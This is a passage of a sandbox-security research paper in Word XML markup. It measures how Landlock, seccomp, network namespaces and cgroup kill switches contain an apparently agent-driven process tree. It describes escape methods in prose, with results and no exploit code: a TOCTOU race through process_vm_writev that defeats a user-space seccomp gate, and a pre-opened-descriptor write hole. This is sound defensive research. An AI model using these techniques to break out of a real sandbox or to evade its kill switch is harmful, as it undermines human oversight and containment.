      <w:r>
        <w:t xml:space="preserve">: no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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execveat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—enforced by a seccomp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SCMP_ACT_ERRNO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deny, which is deterministic and has no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allow path to race.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">I3 network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: no off-host egress—enforced by an empty network namespace with no route, not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by a policy layer. A mediating egress broker is named in the threat model but not built here, so we claim</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">no egress,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egress through the designated broker.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1002"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">I4 process tree</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: the supervisor can drive the whole descendant tree to zero live</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">processes—enforced by a host-owned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup.kill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/>
        </w:rPr>
        <w:t xml:space="preserve">I5 resources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: process count and memory stay under a cap—enforced by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pids.max</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">memory.max</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I1–I3 need no privilege and we measure them here; I4–I5 require a writable cgroup, which the evaluation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">host does not delegate to an unprivileged user, so they are specified and scripted separately</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:killswitch">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). The composed sandbox (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">composed_probe.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) applies the three sound</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">controls to itself and runs each attack in its own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child—all layers are inherited across</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fork</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">—reading the oracle from the kernel’s errno and from ground truth on disk. These are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hand-written probes: a probe issues a syscall or submits a ring operation; it is not a model.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Invariant / attack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Oracle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I1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">openat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">write outside scratch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EACCES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path absent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I1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 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">alias</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EACCES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path absent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I1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">creat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">alias</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EACCES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path absent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I1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">io_uring</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">openat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EACCES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path absent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I1 write inside scratch (control)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">file written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I1 write through a pre-domain descriptor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succeeded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">sentinel leaked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I2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">execve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">EPERM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I3 TCP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">connect</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">off host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ENETUNREACH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no packet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I3 UDP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sendto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">off host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ENETUNREACH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no packet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I3 raw</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sendto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">off host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">denied (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ENETUNREACH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no packet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The result is identical across five runs. Two points carry the section. First, the composition is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">strictly stronger than any single layer: the UDP and raw sockets that pass a Landlock TCP ruleset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">untouched (Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) are closed here, because I3 is enforced by the namespace and not by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Landlock. Which layer governs a given invariant is the whole point—stacking them covers what each leaves</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">open, and reading</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the sandbox is safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">off any one layer is the Part I error repeated. Second, one</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attack succeeds: a write through a descriptor opened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the Landlock domain was entered. That</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is the pre-open hole of Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:landlock">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, and its survival in the composed sandbox is the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">measured form of a discipline requirement—a supervisor that hands the target a descriptor it opened</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">outside the domain (the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ADDFD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delegation Part I recommends is exactly such a hand-off) reopens I1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unless that descriptor’s rights are constrained. Every attack in the matrix that acquired its access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">after</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the domain was entered was denied; we claim the invariant for that tested class, and by</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">construction for access acquired after entry, not as a general property of the composition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="sec:memmut"/>
      <w:r>
        <w:t xml:space="preserve">Runtime memory mutation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The TOCTOU of Part I flips the gate’s pathname buffer with a sibling thread. The natural question is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">whether the defect is specific to that trick. It is not: the flaw is the second read the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flag forces, so any writer that reaches the buffer in the window wins, and we show it from a second angle.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">A separate process, sharing no memory with the target, rewrites the buffer through</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">process_vm_writev</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">while the target’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thread is parked on the notification; the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">target grants the writer access with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PR_SET_PTRACER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which an attacker owning the target can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do. Against the same gate the external writer opened the persistence path on 28.5–44.2% of attempts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">across five runs of 4000, at least as often as the in-process thread</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Section </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec:toctou">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">’s 18.9–23.1%). The other external mechanisms the literature names</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/pid/mem</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ptrace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">poke) write the same bytes to the same address in the same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">window; we do not restate one finding as several. The single variant that would add a property rather than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a mechanism is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">userfaultfd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which lets the attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">pause</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the faulting read and supply the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">page at a chosen moment, making the race deterministic rather than probabilistic; on this host it needs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">privilege (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/userfaultfd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is root-only,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vm.unprivileged_userfaultfd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is 0) and is left</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to the privileged step.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The composed sandbox denied the identical external flip on every attempt. Run against the Landlock target,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the mutation opened the evil path 0 times in 4000: the flip only changes which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">denied</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">path is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">attempted, because the decision is taken at the LSM hook on the resolved object and there is no user-space</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">check left to invalidate. Memory mutation defeats a control that decides in user space; it has nothing to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invalidate once the decision moves into the kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="sec:killswitch"/>
      <w:r>
        <w:t xml:space="preserve">Process-tree termination and resource bounds</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I4 and I5 are enforced by a host-owned</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cgroup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v2, which the unprivileged evaluation host does not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">delegate, so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">killswitch.sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">runs as the one privileged step of the artifact. We report</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">correctness, not latency: this host’s non-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, emulated kernel would not support a credible</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">latency figure, and a latency benchmark belongs on a native kernel (future work). The agent is a bounded</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tree—thirty persistent workers, each continuously forking short-lived children, so the process set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">churns while the population stays near ninety.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invariant / mechanism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I4 PID-enumeration sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">survivors, 20 trials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">8/20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I4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cgroup.kill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">survivors, 20 trials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0/20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I4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cgroup.kill</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">work landing after the trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">338 writes, then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">populated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I4</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">cgroup.freeze</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">work advance while frozen (0.7 s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0 (98 procs inspectable)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I5</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pids.max</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">=20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">peak processes / fork denials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20 / 2078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I5</w:t>
            </w:r>
            <w:r>
